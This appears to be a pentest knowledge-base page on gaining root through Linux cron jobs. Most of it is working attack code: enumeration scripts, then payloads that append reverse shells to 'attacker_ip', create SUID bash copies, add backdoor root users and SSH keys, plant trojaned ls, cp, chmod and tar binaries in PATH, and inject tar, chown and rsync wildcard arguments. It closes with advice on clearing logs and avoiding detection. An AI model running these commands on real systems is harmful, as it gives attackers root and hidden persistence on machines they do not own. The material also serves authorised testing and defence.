Cron job exploitation
Understanding Cron Job Vulnerabilities
What Makes Cron Jobs Dangerous
Cron jobs are scheduled tasks that run automatically at specified times with the privileges of their owner. They present excellent privilege escalation opportunities because they often run as root, execute scripts with weak permissions, or use relative paths that can be hijacked.
The Attack Principle: Exploit cron jobs that:
Execute scripts or commands you can modify
Use relative paths without specifying full binary locations
Run as higher-privileged users (especially root)
Process user-controllable input or files
Have weak file permissions on their executables or configuration
Why This Works: Cron jobs run with the privileges of the user who owns the crontab entry. If you can modify what a root cron job executes, you gain root privileges when the job runs.
Cron Job Discovery and Enumeration
System-Wide Cron Job Discovery
Cron Configuration Files:
# Main system crontab
cat /etc/crontab
# System cron directories
ls -la /etc/cron.d/
ls -la /etc/cron.daily/
ls -la /etc/cron.hourly/
ls -la /etc/cron.monthly/
ls -la /etc/cron.weekly/
# Check all cron directory contents
find /etc/cron* -type f -exec cat {} \; 2>/dev/null
# Anacron configuration (for systems without permanent uptime)
cat /etc/anacrontab 2>/dev/nullUser-Specific Cron Jobs:
# Current user's cron jobs
crontab -l
# All user cron jobs (if accessible)
ls -la /var/spool/cron/crontabs/ 2>/dev/null
cat /var/spool/cron/crontabs/* 2>/dev/null
# Alternative cron spool locations
ls -la /var/spool/cron/ 2>/dev/null
ls -la /var/cron/tabs/ 2>/dev/nullSystemd Timers (Modern Cron Alternative):
# List active systemd timers
systemctl list-timers
systemctl list-timers --all
# Timer configuration files
find /etc/systemd/system -name "*.timer" -exec cat {} \; 2>/dev/null
find /lib/systemd/system -name "*.timer" -exec cat {} \; 2>/dev/null
find /usr/lib/systemd/system -name "*.timer" -exec cat {} \; 2>/dev/null
# Check specific timer details
systemctl cat [timer-name].timer
systemctl status [timer-name].timerCron Job Analysis and Permission Checking
Script and Binary Permissions:
# Find all scripts referenced in cron jobs and check their permissions
grep -r "\.sh\|\.py\|\.pl\|\.rb" /etc/cron* 2>/dev/null | while read line; do
script=$(echo "$line" | grep -oE "/[^[:space:]]+(\.sh|\.py|\.pl|\.rb)")
if [ -f "$script" ]; then
ls -la "$script"
fi
done
# Check for world-writable cron scripts
find /etc/cron* -type f -perm -002 2>/dev/null
find /var/spool/cron -type f -perm -002 2>/dev/null
# Check for cron scripts writable by current user
find /etc/cron* -type f -writable 2>/dev/nullCron Log Analysis:
# Check cron execution logs
cat /var/log/cron 2>/dev/null
cat /var/log/cron.log 2>/dev/null
grep CRON /var/log/syslog 2>/dev/null
# Check for recently executed cron jobs
journalctl -u cron.service 2>/dev/null
journalctl | grep -i cron 2>/dev/nullDirect Script Modification Attacks
Writable Cron Scripts
Finding Modifiable Scripts:
# Check if cron scripts are writable by current user
for cronfile in /etc/crontab /etc/cron.d/* /etc/cron.daily/* /etc/cron.hourly/* /etc/cron.monthly/* /etc/cron.weekly/*; do
if [ -f "$cronfile" ] && [ -w "$cronfile" ]; then
echo "Writable cron file: $cronfile"
ls -la "$cronfile"
fi
done
# Find scripts referenced in cron jobs and check if writable
grep -r "sh\|py\|pl\|rb" /etc/cron* 2>/dev/null | grep -oE "/[^[:space:]]+" | while read script; do
if [ -f "$script" ] && [ -w "$script" ]; then
echo "Writable cron script: $script"
ls -la "$script"
fi
doneScript Modification for Privilege Escalation:
# If you find a writable script executed by root cron job
# Method 1: Add reverse shell
echo 'bash -i >& /dev/tcp/attacker_ip/4444 0>&1' >> /path/to/writable_script.sh
# Method 2: Add SUID shell creation
echo 'cp /bin/bash /tmp/rootshell && chmod +s /tmp/rootshell' >> /path/to/writable_script.sh
# Method 3: Add user creation
echo 'useradd -m hacker -s /bin/bash' >> /path/to/writable_script.sh
echo 'echo "hacker:Password123!" | chpasswd' >> /path/to/writable_script.sh
echo 'usermod -aG sudo hacker' >> /path/to/writable_script.sh
# Method 4: SSH key addition
echo 'mkdir -p /root/.ssh' >> /path/to/writable_script.sh
echo 'echo "ssh-rsa YOUR_PUBLIC_KEY" >> /root/.ssh/authorized_keys' >> /path/to/writable_script.sh
echo 'chmod 600 /root/.ssh/authorized_keys' >> /path/to/writable_script.sh
# Wait for cron job to execute (check timing in crontab)Path Hijacking in Cron Jobs
Understanding Cron PATH Issues
Why PATH Hijacking Works in Cron:
Cron jobs often run with minimal PATH (usually just
/usr/bin:/bin)Scripts may call commands without full paths
You can create malicious binaries in PATH directories
Cron doesn't inherit user's PATH modifications
Finding PATH-Vulnerable Cron Jobs:
# Check current cron PATH
grep -i path /etc/crontab
# Find cron jobs that use relative commands
grep -r -E "(^|[[:space:]])(ls|cat|cp|mv|rm|chmod|chown|tar|zip|unzip|wget|curl)[[:space:]]" /etc/cron* 2>/dev/null
# Look for commands without full paths in scripts
find /etc/cron* -type f -exec grep -l -E "(^|[[:space:]])[a-z]+" {} \; 2>/dev/null | while read file; do
echo "=== $file ==="
grep -E "(^|[[:space:]])[a-z]+" "$file" | head -5
donePATH Hijacking Exploitation
Creating Malicious Binaries:
# If cron job calls 'tar' without full path and you can write to /tmp
# And if /tmp is in cron's PATH or you can modify PATH
# Create malicious tar binary
cat > /tmp/tar << 'EOF'
#!/bin/bash
# Execute original tar command to avoid suspicion
/bin/tar "$@"
# Add malicious payload
cp /bin/bash /tmp/rootshell
chmod +s /tmp/rootshell
EOF
chmod +x /tmp/tar
# If /tmp is not in PATH, try to find writable PATH directory
echo $PATH | tr ':' '\n' | while read dir; do
if [ -d "$dir" ] && [ -w "$dir" ]; then
echo "Writable PATH directory: $dir"
cp /tmp/tar "$dir/tar"
fi
doneCommon Command Hijacking:
# Create malicious versions of commonly used commands in cron jobs
# Malicious 'ls' command
cat > /tmp/ls << 'EOF'
#!/bin/bash
/bin/ls "$@"
echo "hacker:x:0:0:root:/root:/bin/bash" >> /etc/passwd
EOF
# Malicious 'cp' command
cat > /tmp/cp << 'EOF'
#!/bin/bash
/bin/cp "$@"
chmod +s /bin/bash
EOF
# Malicious 'chmod' command
cat > /tmp/chmod << 'EOF'
#!/bin/bash
/bin/chmod "$@"
/bin/bash -c 'bash -i >& /dev/tcp/attacker_ip/4444 0>&1' &
EOF
chmod +x /tmp/ls /tmp/cp /tmp/chmodWildcard Injection in Cron Jobs
Understanding Wildcard Vulnerabilities
Why Wildcards Are Dangerous:
Cron jobs often use wildcards for file operations
Wildcards expand to include filenames you create
Malicious filenames can become command arguments
File creation is often user-controllable
Finding Wildcard Usage:
# Search for wildcards in cron jobs
grep -r "\*" /etc/cron* 2>/dev/null
# Look for common dangerous patterns
grep -r -E "(rm|cp|mv|tar|zip)\s+.*\*" /etc/cron* 2>/dev/null
grep -r -E "find.*\*" /etc/cron* 2>/dev/nullWildcard Exploitation Techniques
Tar Wildcard Injection:
# If cron job contains: tar -cf backup.tar /home/user/*
# Create malicious files in /home/user/
cd /home/user/
touch -- '--checkpoint=1'
touch -- '--checkpoint-action=exec=bash shell.sh'
# Create payload script
echo '#!/bin/bash' > shell.sh
echo 'cp /bin/bash /tmp/rootshell' >> shell.sh
echo 'chmod +s /tmp/rootshell' >> shell.sh
chmod +x shell.sh
# When cron runs: tar -cf backup.tar /home/user/*
# It becomes: tar -cf backup.tar /home/user/file1 /home/user/--checkpoint=1 /home/user/--checkpoint-action=exec=bash shell.sh
# The --checkpoint flags execute your scriptChown Wildcard Injection:
# If cron job contains: chown root:root /tmp/*
cd /tmp/
touch -- '--reference=/etc/passwd'
touch someFile
# When cron runs: chown root:root /tmp/*
# It becomes: chown root:root /tmp/--reference=/etc/passwd /tmp/someFile
# This changes someFile ownership to match /etc/passwd (root:root)Rsync Wildcard Injection:
# If cron job contains: rsync -a /home/user/* /backup/
cd /home/user/
touch -- '-e sh shell.sh'
echo '#!/bin/bash' > shell.sh
echo '/bin/bash' >> shell.sh
chmod +x shell.sh
# When cron runs, rsync interprets -e sh shell.sh as remote shell executionMonitoring and Real-Time Exploitation
Real-Time Cron Monitoring
Using pspy for Process Monitoring:
# Download and run pspy to monitor processes in real-time
wget https://github.com/DominicBreuker/pspy/releases/latest/download/pspy64
chmod +x pspy64
./pspy64
# Look for:
# - Cron jobs executing with high UIDs (root = UID 0)
# - Commands with relative paths
# - Scripts processing user-controllable files
# - Temporary file creation patternsTiming-Based Exploitation
Determining Cron Job Schedule:
# Analyze cron timing from crontab entries
cat /etc/crontab | grep -v "^#" | while read line; do
if [[ $line =~ [0-9] ]]; then
echo "Cron schedule: $line"
fi
done
# Calculate next execution time
# Format: minute hour day month day_of_week command
# * = every unit, */5 = every 5 units, 0-23 = rangeKey Operational Considerations
Success Indicators
Cron job executes your modified script or command
Privilege escalation achieved (check with
idafter waiting for execution)File creation in expected locations (SUID shells, backdoor users)
Log entries showing successful command execution
Common Failure Points
No writable cron files or scripts found
Absolute paths used in cron jobs prevent PATH hijacking
Timing issues - cron jobs may run infrequently
File permissions prevent modification of target files
SELinux/AppArmor prevents exploitation
Timing Considerations
Cron jobs timing varies from every minute to monthly
System load can affect cron execution timing
Race conditions require precise timing
Log monitoring may detect unusual cron activity
Cleanup and Stealth
Restore original files after exploitation
Remove temporary malicious files created during exploitation
Clear relevant logs if possible
Maintain cron job functionality to avoid detection
Cron job exploitation requires patience and careful analysis, but often provides reliable privilege escalation paths due to the automated nature of scheduled tasks and common configuration mistakes.
Last updated
Was this helpful?